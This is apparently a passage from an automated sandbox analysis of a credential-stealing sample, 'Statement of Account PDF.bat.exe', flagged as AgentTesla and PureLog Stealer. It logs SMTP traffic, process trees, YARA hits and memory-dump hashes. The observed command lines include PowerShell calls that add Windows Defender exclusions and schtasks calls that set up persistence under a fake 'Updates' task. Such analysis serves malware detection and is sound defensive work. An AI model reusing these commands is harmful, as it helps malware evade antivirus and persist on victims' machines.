                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:37:05.979962111 CEST49787587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:37:06.030572891 CEST5874978850.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:37:06.030741930 CEST49788587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:37:06.193125010 CEST5874978750.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:37:06.230432034 CEST5874978850.87.195.61192.168.2.4220 TLS go ahead


                                                      Target ID:0
                                                      Start time:10:32:51
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Statement of Account PDF.bat.exe"
                                                      Imagebase:0x4d0000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1700653245.0000000003949000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1710196910.0000000007600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:10:32:55
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"
                                                      Imagebase:0xfb0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:10:32:55
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:10:32:55
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                                                      Imagebase:0xfb0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:10:32:55
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:10:32:55
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp"
                                                      Imagebase:0xbe0000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:10:32:55
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:10:32:56
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Statement of Account PDF.bat.exe"
                                                      Imagebase:0x9f0000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4082420582.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4082420582.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:10
                                                      Start time:10:32:57
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                                                      Imagebase:0x20000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 47%, ReversingLabs
                                                      • Detection: 57%, Virustotal
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:10:32:58
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff693ab0000
                                                      File size:496'640 bytes
                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:10:33:02
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp216B.tmp"
                                                      Imagebase:0xbe0000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:10:33:02
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:10:33:03
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                                                      Imagebase:0xb0000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:10:33:03
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                                                      Imagebase:0xbe0000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4080192144.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4080192144.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4080192144.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4080192144.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:17
                                                      Start time:10:33:03
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 1816
                                                      Imagebase:0x830000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:18
                                                      Start time:10:33:08
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                      Imagebase:0x7d0000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.1856813364.0000000004928000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.1856813364.0000000004928000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 47%, ReversingLabs
                                                      • Detection: 57%, Virustotal
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:10:33:11
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp44D2.tmp"
                                                      Imagebase:0xbe0000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:21
                                                      Start time:10:33:11
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:10:33:12
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                      Imagebase:0xfd0000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.1916411729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.1916411729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.1928490064.000000000356C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.1928490064.0000000003541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.1928490064.0000000003541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.1928490064.0000000003574000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Has exited:true

                                                      Target ID:24
                                                      Start time:10:33:12
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 1828
                                                      Imagebase:0x830000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:25
                                                      Start time:10:33:17
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                      Imagebase:0x4a0000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.1945703172.0000000004798000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.1945703172.0000000004798000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Has exited:true

                                                      Target ID:28
                                                      Start time:10:33:20
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp6598.tmp"
                                                      Imagebase:0xbe0000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:29
                                                      Start time:10:33:20
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:30
                                                      Start time:10:33:20
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                      Imagebase:0x520000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000002.4081952252.000000000294B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001E.00000002.4081952252.000000000294B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Has exited:false

                                                      Target ID:32
                                                      Start time:10:33:20
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7400 -s 1788
                                                      Imagebase:0x830000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                        Execution Graph

                                                        Execution Coverage:8.8%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:47
                                                        Total number of Limit Nodes:2
                                                        execution_graph (node and edge list omitted); API calls named in the graph: DuplicateHandle, GetModuleHandleW, LoadLibraryExW, CreateActCtxA, DrawTextExW

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq$Hbq$Hbq$Hbq$Hbq$Hbq$Hbq$PH^q
                                                        • API String ID: 0-3076519024
                                                        • Opcode ID: c5081897fb8c8056105cf34b08c1bcac3a2298f1975ee95d619b686c22a5c25a
                                                        • Instruction ID: 3c209c813bc34938581cf3f1663a9976832f611b30b5d9b74ba7d7afcacd1b33
                                                        • Opcode Fuzzy Hash: c5081897fb8c8056105cf34b08c1bcac3a2298f1975ee95d619b686c22a5c25a
                                                        • Instruction Fuzzy Hash: 17729D31B002548FDB58AB79C85466E7BB6FFC8310F248669D40ADB3A5CE34ED46C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: &IH3$4'^q$TJcq$Te^q$pbq$xbaq
                                                        • API String ID: 0-1216527603
                                                        • Opcode ID: cb68446657f5d2564efb297c69cd23db5718d07ec4f48b275f27a97429af9b94
                                                        • Instruction ID: af2dc99779ab733d066c1192cccb42e3acc6dcd45c90727c8fd22a2b614e27a1
                                                        • Opcode Fuzzy Hash: cb68446657f5d2564efb297c69cd23db5718d07ec4f48b275f27a97429af9b94
                                                        • Instruction Fuzzy Hash: 10B2A375A00628CFDB65CF69C984AD9BBB2BF89304F1581E9D509AB325DB319E81CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q$)"
                                                        • API String ID: 0-4031938444
                                                        • Opcode ID: 783d9b125779a37d24f1c0bd0bd36affec7fa430ab445e3fb69deb88babf9797
                                                        • Instruction ID: bdf63e30a901ad65acb992da6833eac6fed2065a424240eaacc98964a2a53ddc
                                                        • Opcode Fuzzy Hash: 783d9b125779a37d24f1c0bd0bd36affec7fa430ab445e3fb69deb88babf9797
                                                        • Instruction Fuzzy Hash: D581C3B4E002099FDB08CFEAC9846EEBBB2FF89310F24942AD415AB354D7349946CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tIh
                                                        • API String ID: 0-443931868
                                                        • Opcode ID: 6c3cd37dbbc21670a6792e7005c27377856d3f71375e4e3845d0ed84f00e8acc
                                                        • Instruction ID: 756da5a5b20ebfac758b38e483b28fe9ad4210f4122b68d8bd7ddd3306f6f200
                                                        • Opcode Fuzzy Hash: 6c3cd37dbbc21670a6792e7005c27377856d3f71375e4e3845d0ed84f00e8acc
                                                        • Instruction Fuzzy Hash: 48D115B0D1421AEBCB04CF99D5848EEFBB2FF99300F14D55AD512AB254D734AA82CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6a42b12b0bd18798e4d4335ea0e350c96b72d2022d75e8a5dd379489696d33c5
                                                        • Instruction ID: fcea9d3011fe1c4bda68c0b788badb0c52621dfd536ca4454933f44d7c1111e8
                                                        • Opcode Fuzzy Hash: 6a42b12b0bd18798e4d4335ea0e350c96b72d2022d75e8a5dd379489696d33c5
                                                        • Instruction Fuzzy Hash: 00721B70A00219CFDB54DF68C884AEDB7B2FF89310F1586A9D459AB351DB34AE85CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707322732.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6cc0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d08dcb20eecec395334e2aa8589c4d55e6fc3aa146ac48969ffdd3abc086044d
                                                        • Instruction ID: 551cfa895803d223f7546486cc15161b80cb649088dde9f78bdfd4c49fe016f5
                                                        • Opcode Fuzzy Hash: d08dcb20eecec395334e2aa8589c4d55e6fc3aa146ac48969ffdd3abc086044d
                                                        • Instruction Fuzzy Hash: AC52E534A006048FCB54DF68C588A6DB7F2FF89315F2585ACD40A9B765DB30ED86CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f0f393b3102f18bd9db8c73256a2632071484746d9eb04d91fe286c4e1241c06
                                                        • Instruction ID: e0fcb9020bc6248586221f6741891783a30433839bf0dfa70e0746c51d16761e
                                                        • Opcode Fuzzy Hash: f0f393b3102f18bd9db8c73256a2632071484746d9eb04d91fe286c4e1241c06
                                                        • Instruction Fuzzy Hash: D1525B34A003458FDB14DF28C844B99B7B2FF89314F2586A9D5586F3A2DB71AD86CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: edc95510e5b5c47ce0447ff60f23e72f209086928ccdf78fc9daf8f5d9dfd758
                                                        • Instruction ID: 15c5cc945cd5801fb7528519e9df1ad82ecbdac90b7014aa510ca6aeb2b4dec6
                                                        • Opcode Fuzzy Hash: edc95510e5b5c47ce0447ff60f23e72f209086928ccdf78fc9daf8f5d9dfd758
                                                        • Instruction Fuzzy Hash: 0B524B34A003458FDB14DF28C844B99B7B2FF89314F2586A9D5586F3A2DB71A986CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 214d12495148c75c7de29a73a4d351e06ec09273a11c8e253b2e2a46308e5ef2
                                                        • Instruction ID: 95fac4909dc26f43358ab3c48b5ccd7459a0294c255d5e0bc3f9bf883eba1084
                                                        • Opcode Fuzzy Hash: 214d12495148c75c7de29a73a4d351e06ec09273a11c8e253b2e2a46308e5ef2
                                                        • Instruction Fuzzy Hash: 8B8112B4E1421ADFCB44CFA9D8809EEFBB6FB9E200F10991AD415B7214D7349906CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 625ca9bfe781f18bffde463c1c02d9b5c72ee1f5fea4b65698decc6267b42e1e
                                                        • Instruction ID: dd731879ee3a53235b557ac69fa6b24202b6e4d66cd21e201125b5b3210abe8f
                                                        • Opcode Fuzzy Hash: 625ca9bfe781f18bffde463c1c02d9b5c72ee1f5fea4b65698decc6267b42e1e
                                                        • Instruction Fuzzy Hash: DE2108B1E056588BEB58DFABD8046DEBAF7AFC8300F14C07AD4196B258DB3409428F51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f7480c14b3f6ff30357ace4356bbd9685da64fcbc505a43e9ba2363a211851d
                                                        • Instruction ID: cda56c45b80c707434acb068113570865a96ce7e412b8f0262ba6bf087fc8f44
                                                        • Opcode Fuzzy Hash: 2f7480c14b3f6ff30357ace4356bbd9685da64fcbc505a43e9ba2363a211851d
